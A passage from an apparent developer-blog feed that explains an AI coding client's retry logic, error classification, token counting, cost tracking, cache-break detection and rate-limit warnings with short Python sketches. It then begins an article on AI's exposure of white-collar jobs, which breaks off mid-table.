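                raise  # exhausted or non-retryable: surface the error
            yield (f"Retrying in {delays[attempt - 1]} seconds... "
                   f"(attempt {attempt}/{max_attempts})")
```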

&lt;h3&gt;
  
  
  The Decision Tree
&lt;/h3&gt;

&lt;p&gt;When an error occurs, the handler walks through a priority-ordered sequence:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;User abort&lt;/strong&gt; → Throw immediately. No retry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fast mode + rate limit (429) or overload (529)&lt;/strong&gt; → Check the retry-after header:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Under 20 seconds: Wait and retry at fast speed. This preserves the prompt cache — switching speed would change the model identifier and break the cache.&lt;/li&gt;
&lt;li&gt;Over 20 seconds or unknown: Enter a cooldown period (minimum 10 minutes). During cooldown, requests use standard speed. This prevents spending 6x the cost on retries during extended overload.&lt;/li&gt;
&lt;li&gt;If the server signals that overage isn't available (via a specific header), fast mode is permanently disabled for the session.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Overload (529) from a background source&lt;/strong&gt; → Drop immediately. Background work (title generation, suggestions, classifiers) doesn't deserve retries during a capacity crisis. Each retry is 3–10x gateway amplification. The user never sees background failures anyway. New query sources default to no-retry — they must be explicitly added to a foreground allowlist.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Consecutive 529 counter&lt;/strong&gt; → After 3 consecutive overload errors, trigger a model fallback if one is configured. The counter persists across streaming-to-nonstreaming fallback transitions (a streaming 529 pre-seeds the counter for the non-streaming retry loop). Without a fallback model, external users get "Repeated 529 Overloaded errors" and the request fails.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Authentication errors&lt;/strong&gt; → Re-create the entire SDK client. OAuth token expired (401)? Refresh it. OAuth revoked (403 + specific message)? Force re-login. AWS credentials expired? Clear the credential cache. GCP token invalid? Refresh credentials. The retry gets a fresh client with fresh credentials.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Stale connection (ECONNRESET/EPIPE)&lt;/strong&gt; → Disable HTTP keep-alive (behind a feature flag) and reconnect. Keep-alive is normally desirable, but a stale pooled connection that repeatedly resets is worse than the overhead of new connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Context overflow (input + max_tokens &amp;gt; limit)&lt;/strong&gt; → Parse the error for exact token counts, calculate available space with a safety buffer, adjust the max_tokens parameter, and retry. A floor of 3,000 tokens prevents the model from having zero room to respond. If thinking is enabled, the adjustment ensures the thinking budget isn't silently eliminated.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Everything else&lt;/strong&gt; → Check if retryable (connection errors, 408, 409, 429, 5xx → yes; 400, 404 → no). Calculate delay. Sleep. Retry.&lt;/p&gt;
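&lt;p&gt;The catch-all step is a small predicate (status lists taken from the rule above):&lt;/p&gt;

```python
RETRYABLE_STATUSES = {408, 409, 429}
NON_RETRYABLE_STATUSES = {400, 404}

def is_retryable(status=None, is_connection_error=False):
    """Default retryability: connection errors, 408/409/429, and 5xx retry."""
    if is_connection_error:
        return True
    if status is None:
        return False  # unknown error with no status: don't retry blindly
    if status in NON_RETRYABLE_STATUSES:
        return False
    return status in RETRYABLE_STATUSES or 500 <= status <= 599
```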

&lt;h3&gt;
  
  
  Backoff
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;base_delay&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;min&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="n"&gt;ms&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;^&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;attempt&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;max_delay&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;jitter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;random&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;base_delay&lt;/span&gt;
&lt;span class="n"&gt;delay&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base_delay&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;jitter&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The jitter is 0–25% of the base, preventing a thundering herd when many clients retry simultaneously. If the server sends a &lt;code&gt;Retry-After&lt;/code&gt; header, that value overrides the calculated delay.&lt;/p&gt;
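&lt;p&gt;The pseudocode above, made runnable with the &lt;code&gt;Retry-After&lt;/code&gt; override (the 32-second cap here is illustrative; as noted below, the actual max delay grows with attempts):&lt;/p&gt;

```python
import random

def backoff_delay(attempt, max_delay_ms=32_000, retry_after_ms=None,
                  rng=random.random):
    """Exponential backoff with 0-25% jitter; a server Retry-After wins."""
    if retry_after_ms is not None:
        return retry_after_ms  # server-specified delay overrides the calculation
    base = min(500 * 2 ** (attempt - 1), max_delay_ms)
    return base + rng() * 0.25 * base  # jitter spreads simultaneous retries
```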

&lt;p&gt;Three backoff modes exist:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Normal&lt;/strong&gt;: Up to 10 attempts, max delay grows with attempts.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Persistent&lt;/strong&gt; (headless/unattended sessions): Retries 429 and 529 indefinitely with a 5-minute cap. Long sleeps are chunked into 30-second intervals, and each chunk yields a status message so the host environment doesn't kill the session for inactivity. A 6-hour absolute cap prevents pathological loops.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rate-limited with reset timestamp&lt;/strong&gt;: The server sends an &lt;code&gt;anthropic-ratelimit-unified-reset&lt;/code&gt; header with the Unix timestamp when the rate limit window resets. The client sleeps until that exact time rather than polling with exponential backoff.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The x-should-retry Header
&lt;/h3&gt;

&lt;p&gt;The server can explicitly tell the client whether to retry via &lt;code&gt;x-should-retry: true|false&lt;/code&gt;. But the client doesn't always obey:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Subscribers hitting rate limits&lt;/strong&gt;: The server says "retry: true" (the limit resets in hours). But the client says no — waiting hours is not useful. Enterprise users are an exception because they typically use pay-as-you-go rather than window-based limits.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Internal users on 5xx errors&lt;/strong&gt;: The server may say "retry: false" (the error is deterministic). But internal users can ignore this for server errors specifically, because internal infrastructure sometimes returns transient 5xx errors that resolve on retry.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote environments on 401/403&lt;/strong&gt;: Infrastructure-provided JWTs can fail transiently (auth service flap, network hiccup). The server says "don't retry with the same bad key" — but the key isn't bad, the auth service is flapping. So the client retries anyway.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each of these is a case where the client has context the server doesn't. The server sees "this request failed with status X." The client knows "I'm a subscriber who can't wait 5 hours" or "my auth is infrastructure-managed, not user-provided."&lt;/p&gt;

&lt;h2&gt;
  
  
  Error Classification
&lt;/h2&gt;

&lt;p&gt;When retries are exhausted, the error is converted into a user-facing message with a recovery action. Over 20 specific error patterns map to targeted messages:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pattern&lt;/th&gt;
&lt;th&gt;User Sees&lt;/th&gt;
&lt;th&gt;Recovery&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Context too long with token counts&lt;/td&gt;
&lt;td&gt;"Prompt is too long"&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/compact&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Model not available&lt;/td&gt;
&lt;td&gt;Subscription-aware message&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/model&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;API key invalid&lt;/td&gt;
&lt;td&gt;"Not logged in"&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/login&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OAuth revoked&lt;/td&gt;
&lt;td&gt;"Token revoked"&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/login&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credits exhausted&lt;/td&gt;
&lt;td&gt;"Credit balance too low"&lt;/td&gt;
&lt;td&gt;Add credits&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rate limit with reset time&lt;/td&gt;
&lt;td&gt;Per-plan message&lt;/td&gt;
&lt;td&gt;Wait or &lt;code&gt;/upgrade&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PDF exceeds page limit&lt;/td&gt;
&lt;td&gt;Size limit shown&lt;/td&gt;
&lt;td&gt;Reduce pages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image too large&lt;/td&gt;
&lt;td&gt;Dimension limit shown&lt;/td&gt;
&lt;td&gt;Resize&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bedrock model access denied&lt;/td&gt;
&lt;td&gt;Model access guidance&lt;/td&gt;
&lt;td&gt;Request access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Request timeout&lt;/td&gt;
&lt;td&gt;"Request timed out"&lt;/td&gt;
&lt;td&gt;Retry&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Messages are context-sensitive. Interactive sessions show keyboard shortcuts ("esc esc" to abort). SDK sessions show generic text. Subscription users get different error messages than API key users. Internal users get a Slack channel link for rapid triage.&lt;/p&gt;

&lt;p&gt;Separately, every error gets classified into one of 25 analytics types (&lt;code&gt;rate_limit&lt;/code&gt;, &lt;code&gt;prompt_too_long&lt;/code&gt;, &lt;code&gt;server_overload&lt;/code&gt;, &lt;code&gt;auth_error&lt;/code&gt;, &lt;code&gt;ssl_cert_error&lt;/code&gt;, &lt;code&gt;unknown&lt;/code&gt;, etc.) for aggregate monitoring. This dual classification — human-readable + machine-readable — lets the same error inform both the user and the engineering dashboard.&lt;/p&gt;

&lt;h3&gt;
  
  
  The 529 Detection Problem
&lt;/h3&gt;

&lt;p&gt;The SDK sometimes fails to pass the 529 status code during streaming. The server sends 529, but by the time the error reaches the client, the status field may be undefined or different. The client works around this by also checking the error message body for the string &lt;code&gt;"type":"overloaded_error"&lt;/code&gt;. This string-matching fallback is fragile — if the API changes the error format, it breaks — but it catches a real class of misclassified overload errors that the status code alone misses.&lt;/p&gt;

&lt;p&gt;Similarly, the "fast mode not enabled" error is detected by string-matching the error message (&lt;code&gt;"Fast mode is not enabled"&lt;/code&gt;). The code includes a comment noting this should be replaced with a dedicated response header once the API adds one. String-matching error messages is a known anti-pattern, but when the alternative is failing to detect a recoverable error, fragility is the better trade-off.&lt;/p&gt;
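&lt;p&gt;Both fallbacks are a few lines (the exact strings are as quoted above):&lt;/p&gt;

```python
def is_overloaded_error(status, message):
    """Detect 529 overload even when the SDK drops the status code."""
    if status == 529:
        return True
    # Fragile fallback: match the error body when the status is missing.
    return '"type":"overloaded_error"' in (message or "")

def is_fast_mode_disabled_error(message):
    """String-match until the API exposes a dedicated response header."""
    return "Fast mode is not enabled" in (message or "")
```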

&lt;h2&gt;
  
  
  Token Counting and Cost Tracking
&lt;/h2&gt;

&lt;h3&gt;
  
  
  How Tokens Are Counted
&lt;/h3&gt;

&lt;p&gt;The canonical context size function combines two sources:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;API-reported usage&lt;/strong&gt;: Walk backward through messages to find the last assistant message with a &lt;code&gt;usage&lt;/code&gt; field. This is the server's authoritative token count at that point.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Client-side estimation&lt;/strong&gt;: For messages added after the last API response (the user's new message, any attachment messages), estimate tokens using heuristics: ~4 characters per token for text, 2,000 tokens flat for images, tool name + serialized input length for tool use blocks. Pad by 33%.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The estimation is intentionally conservative. Overestimating triggers compaction too early (wastes a few tokens of capacity). Underestimating triggers a prompt-too-long error (wastes an entire API call).&lt;/p&gt;
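&lt;p&gt;The heuristics translate directly into a sketch (constants from the description; block shapes simplified):&lt;/p&gt;

```python
import json

CHARS_PER_TOKEN = 4
IMAGE_TOKENS = 2000   # flat cost per image
PADDING = 1.33        # pad by 33% to stay conservative

def estimate_tokens(blocks):
    """Heuristic token estimate for messages not yet counted by the API."""
    total = 0.0
    for block in blocks:
        if block["type"] == "text":
            total += len(block["text"]) / CHARS_PER_TOKEN
        elif block["type"] == "image":
            total += IMAGE_TOKENS
        elif block["type"] == "tool_use":
            # tool name + serialized input length
            total += (len(block["name"]) + len(json.dumps(block["input"]))) / CHARS_PER_TOKEN
    return int(total * PADDING)
```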

&lt;p&gt;A subtlety with parallel tool calls: when the model makes N tool calls in one response, streaming emits N separate assistant records sharing the same response ID. The query loop interleaves tool results between them: &lt;code&gt;[assistant(id=A), tool_result, assistant(id=A), tool_result, ...]&lt;/code&gt;. The token counter must walk back to the FIRST message with the matching ID so all interleaved tool results are included. Stopping at the last one would miss them and undercount.&lt;/p&gt;
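&lt;p&gt;A sketch of that walk-back (message shapes simplified):&lt;/p&gt;

```python
def context_anchor_index(messages):
    """Index of the FIRST assistant record sharing the last response ID.

    Parallel tool calls produce several assistant records with one response
    ID, interleaved with tool results; counting from the last record would
    miss those results and undercount.
    """
    last_id = None
    for msg in reversed(messages):
        if msg.get("role") == "assistant" and "usage" in msg:
            last_id = msg["id"]  # last assistant message with API usage
            break
    if last_id is None:
        return None
    for i, msg in enumerate(messages):
        if msg.get("role") == "assistant" and msg.get("id") == last_id:
            return i  # first record with the matching ID
    return None
```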

&lt;h3&gt;
  
  
  Cost Calculation
&lt;/h3&gt;

&lt;p&gt;A per-model pricing table maps model identifiers to rates:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sonnet (3.5 through 4.6):  $3 / $15  per million tokens (input/output)
opus 4/4.1:                $15 / $75
opus 4.5/4.6:              $5 / $25
opus 4.6 fast:             $30 / $150
haiku 4.5:                 $1 / $5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Cache reads cost 10% of input price. Cache writes cost 125% of input price. The formula:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;cost&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;input&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;input_rate&lt;/span&gt;
     &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;output_rate&lt;/span&gt;
     &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cache_read&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;cache_read_rate&lt;/span&gt;
     &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cache_write&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;cache_write_rate&lt;/span&gt;
     &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;web_searches&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="mf"&gt;0.01&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Fast mode pricing is determined by the server, not the client. The API response includes a &lt;code&gt;speed&lt;/code&gt; field in usage data. If the server processed the request at standard speed despite a fast-mode request (possible during overload), you pay standard rates. The client trusts this field for billing rather than its own request parameter.&lt;/p&gt;
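&lt;p&gt;The pricing table and formula combine into a short function (model keys here are simplified labels, and the Opus 4.5/4.6 fallback for unknown models is included):&lt;/p&gt;

```python
# (input_rate, output_rate) in dollars per million tokens
PRICING = {
    "sonnet": (3, 15),
    "opus-4.1": (15, 75),
    "opus-4.5": (5, 25),
    "opus-4.6-fast": (30, 150),
    "haiku-4.5": (1, 5),
}
CACHE_READ_FACTOR = 0.10    # cache reads: 10% of input price
CACHE_WRITE_FACTOR = 1.25   # cache writes: 125% of input price
WEB_SEARCH_COST = 0.01
M = 1_000_000

def request_cost(model, usage):
    """Dollar cost of one API call from server-reported usage fields."""
    # Unknown model IDs fall back to the Opus 4.5/4.6 tier
    input_rate, output_rate = PRICING.get(model, PRICING["opus-4.5"])
    return (
        usage.get("input_tokens", 0) / M * input_rate
        + usage.get("output_tokens", 0) / M * output_rate
        + usage.get("cache_read_tokens", 0) / M * input_rate * CACHE_READ_FACTOR
        + usage.get("cache_write_tokens", 0) / M * input_rate * CACHE_WRITE_FACTOR
        + usage.get("web_searches", 0) * WEB_SEARCH_COST
    )
```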

&lt;p&gt;Costs are persisted per-session. On session resume, the client checks that the saved session ID matches before restoring — preventing one session's costs from bleeding into another. Unknown models (new model IDs not yet in the table) fall back to the Opus 4.5/4.6 tier and fire an analytics event so the table can be updated.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cache Break Detection
&lt;/h2&gt;

&lt;p&gt;A cache break means the server couldn't read the cached prefix and had to re-process all input tokens. On a 100K-token conversation, that's the difference between paying for 5K tokens (cache read) and 100K tokens (full write). Silent cache breaks are an invisible cost multiplier.&lt;/p&gt;

&lt;p&gt;The detection system uses two phases:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pre-call&lt;/strong&gt;: Before each API call, snapshot the state — hashes of the system prompt, tool schemas, cache control config, model name, speed mode, beta headers, effort level, and extra body parameters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Post-call&lt;/strong&gt;: After the response, compare cache read tokens to the previous call's value. If reads dropped by more than 2,000 tokens and didn't reach 95% of the previous value, flag a cache break.&lt;/p&gt;

&lt;p&gt;When a break is detected, the system identifies which snapshot fields changed: model switch, system prompt edit, tool schema addition/removal, speed toggle, beta header change, cache TTL/scope flip. If nothing changed in the snapshot, it infers a time-based cause: over 1 hour since last call (TTL expiry), over 5 minutes (short TTL expiry), or under 5 minutes (server-side eviction).&lt;/p&gt;
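&lt;p&gt;The post-call comparison is a single predicate (thresholds from the description above):&lt;/p&gt;

```python
def is_cache_break(prev_cache_read, curr_cache_read,
                   min_drop=2000, retention_ratio=0.95):
    """Flag a break when cache reads dropped by over 2,000 tokens AND
    fell below 95% of the previous call's value."""
    if prev_cache_read is None:
        return False  # no baseline yet: nothing to compare against
    drop = prev_cache_read - curr_cache_read
    return drop > min_drop and curr_cache_read < prev_cache_read * retention_ratio
```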

&lt;p&gt;A unified diff file is written showing the before/after prompt state. With debug mode enabled, this makes cache break investigation straightforward — you can see exactly which tool schema changed or which system prompt section grew.&lt;/p&gt;

&lt;p&gt;State is tracked per query source with a cap of 10 tracked sources to prevent unbounded memory growth. Short-lived sources (background speculation, session memory extraction) are excluded from tracking — they don't benefit from cross-call analysis.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rate Limits and Early Warnings
&lt;/h2&gt;

&lt;p&gt;After every API response, the client extracts rate limit headers: status (&lt;code&gt;allowed&lt;/code&gt;, &lt;code&gt;allowed_warning&lt;/code&gt;, &lt;code&gt;rejected&lt;/code&gt;), reset timestamp, limit type (&lt;code&gt;five_hour&lt;/code&gt;, &lt;code&gt;seven_day&lt;/code&gt;, &lt;code&gt;seven_day_opus&lt;/code&gt;), overage status, and fallback availability.&lt;/p&gt;

&lt;h3&gt;
  
  
  Early Warnings
&lt;/h3&gt;

&lt;p&gt;Before hitting the actual limit, the client warns users who are burning through quota unusually fast:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;5-hour window:  warn if 90% used but &amp;lt; 72% of time elapsed
7-day window:   warn if 75% used but &amp;lt; 60% of time elapsed
                warn if 50% used but &amp;lt; 35% of time elapsed
                warn if 25% used but &amp;lt; 15% of time elapsed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The intuition: if you've used 90% of your 5-hour quota but only 3.6 hours have passed, you're on pace to hit the wall. The preferred method uses a server-sent &lt;code&gt;surpassed-threshold&lt;/code&gt; header. The client-side time calculation is a fallback.&lt;/p&gt;

&lt;p&gt;False positive suppression: warnings are suppressed when utilization is below 70% (prevents spurious alerts right after a rate limit reset). For team/enterprise users with seamless overage rollover, session-limit warnings are skipped entirely — they'll never hit a wall.&lt;/p&gt;
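&lt;p&gt;The client-side fallback calculation is a pacing check, sketched here with the thresholds from the table above (the server-sent header path and suppression rules are omitted):&lt;/p&gt;

```python
# (utilization_threshold, max_elapsed_fraction) pairs per rate limit window
PACING_RULES = {
    "five_hour": [(0.90, 0.72)],
    "seven_day": [(0.75, 0.60), (0.50, 0.35), (0.25, 0.15)],
}

def should_warn(window, utilization, elapsed_fraction, seamless_overage=False):
    """Warn when quota burn is ahead of the window clock."""
    if seamless_overage:
        return False  # team/enterprise rollover never hits a wall
    return any(
        utilization >= used and elapsed_fraction < elapsed
        for used, elapsed in PACING_RULES.get(window, [])
    )
```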

&lt;h3&gt;
  
  
  Overage Detection
&lt;/h3&gt;

&lt;p&gt;When &lt;code&gt;status&lt;/code&gt; changes from &lt;code&gt;rejected&lt;/code&gt; to &lt;code&gt;allowed&lt;/code&gt; while &lt;code&gt;overageStatus&lt;/code&gt; is also &lt;code&gt;allowed&lt;/code&gt;, the user has silently crossed from subscription quota to overage billing. The client detects this transition and shows a notification: "You're now using extra usage." This matters because overage has its own cost implications.&lt;/p&gt;

&lt;h3&gt;
  
  
  Quota Probing
&lt;/h3&gt;

&lt;p&gt;On startup, a test call checks quota status before the first real query: a single-token request to the smallest model. The call uses &lt;code&gt;.with_response()&lt;/code&gt; to access the raw headers. This lets the UI show rate limit state immediately rather than waiting for the first user message.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Full Round-Trip
&lt;/h2&gt;

&lt;p&gt;Putting it all together, here's one API call:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Message preparation&lt;/strong&gt;: microcompact, autocompact, context collapse&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Request construction&lt;/strong&gt;: system prompt blocks with cache markers, converted messages with cache breakpoints and tool result references, tool schemas, thinking config, beta headers, extra body params&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache state snapshot&lt;/strong&gt;: hash system prompt, tools, config&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Retry wrapper&lt;/strong&gt;: up to 10 attempts with exponential backoff&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Client creation&lt;/strong&gt;: provider-specific SDK with auth, headers, fetch wrapper&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API call&lt;/strong&gt;: streaming request with abort signal and client request ID&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stream processing&lt;/strong&gt;: event-by-event content accumulation, idle watchdog&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tool execution&lt;/strong&gt;: streaming — start tools as they're emitted, before the response completes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Header extraction&lt;/strong&gt;: rate limits, cache metrics, request IDs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache break analysis&lt;/strong&gt;: compare pre/post token ratios&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost tracking&lt;/strong&gt;: per-model pricing, session accumulation, persistence&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Error recovery&lt;/strong&gt;: 20+ error patterns → specific recovery actions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Query loop&lt;/strong&gt;: process tool results, append to history, loop back&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each turn takes 2–30 seconds. A typical session makes 50–200 calls. The retry system makes those calls resilient to transient failures. The caching system makes them affordable. The error classification system makes failures actionable. And the token counter keeps track of exactly how close you are to the edge of the context window.&lt;/p&gt;

&lt;p&gt;The alternative to this defense-in-depth approach is simpler code that fails in opaque ways — silent cost overruns, mysterious context overflows, and retries that amplify outages instead of weathering them. Every layer described here exists because the simpler version broke in production.&lt;/p&gt;

&lt;p&gt;The key architectural choices:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Async generators everywhere&lt;/strong&gt;: The query loop, the retry wrapper, and the stream processor are all async generators. This means every layer can yield events to the UI without blocking. A retry wait yields countdown messages. A compaction yields summary events. The UI stays responsive through multi-minute operations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trust the server's numbers&lt;/strong&gt;: Token counts come from API usage fields, not local tokenization. Cache status is inferred from token ratios, not server state. Cost is calculated from server-reported speed mode, not the client's request. The client doesn't have a tokenizer — it uses character-based estimation for new messages and cross-checks against the server's count on every response.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fail visible, not fail silent&lt;/strong&gt;: Cache breaks are logged with diffs. Cost anomalies fire analytics events. Rate limit transitions trigger notifications. Unknown models get tracked. The system is designed so that degradation is always observable, even if it's not always preventable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Context over rules&lt;/strong&gt;: The retry handler doesn't just ask "is this error retryable?" It asks "is this error retryable for THIS user on THIS provider in THIS mode?" A subscriber hitting 429 is different from an enterprise user hitting 429. A remote environment hitting 401 is different from a local user hitting 401. The same status code gets different treatment depending on context the server can't see.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>api</category>
      <category>claudecode</category>
      <category>architecture</category>
      <category>streaming</category>
    </item>
    <item>
      <title>94% Exposed, 30% Adopted: Why Engineering Leaders Need to Rethink How They Hire</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Tue, 07 Apr 2026 15:37:44 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/94-exposed-30-adopted-the-real-math-behind-ai-and-white-collar-jobs-25lp</link>
      <guid>https://dev.to/oldeucryptoboi/94-exposed-30-adopted-the-real-math-behind-ai-and-white-collar-jobs-25lp</guid>
      <description>&lt;h2&gt;
  
  
  The gap between what AI can do and what it's actually doing is closing. If your hiring process still optimizes for the implementation layer, you're selecting for the part that's being automated.
&lt;/h2&gt;




&lt;p&gt;If you lead a software team, the way you evaluate and hire developers is shifting. Ignore it, and you'll miss strong people or hire for the wrong things.&lt;/p&gt;

&lt;p&gt;This isn't theoretical. Anthropic just released labor market data, and it points to a real change in how we should think about technical talent. 94% of coding tasks could be handled by AI. Only about 30% actually are today. That gap is closing, and it's already changing what a "good developer" looks like.&lt;/p&gt;

&lt;h2&gt;
  
  
  The numbers
&lt;/h2&gt;

&lt;p&gt;Peter McCrory, Anthropic's head of economics, shared more context in Fortune. Their March 2026 report, "Labor Market Impacts of AI: A New Measure and Early Evidence," introduced a framework called "observed exposure" — combining theoretical LLM capability with real-world usage data from Claude.&lt;/p&gt;

&lt;p&gt;The top-line numbers stand out:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Occupation&lt;/th&gt;
&lt;th&gt;Share of tasks AI can perform&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Computer Programmers&lt;/td&gt;
&lt;td&gt;74.5%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Customer Service Representatives&lt;/td&gt;
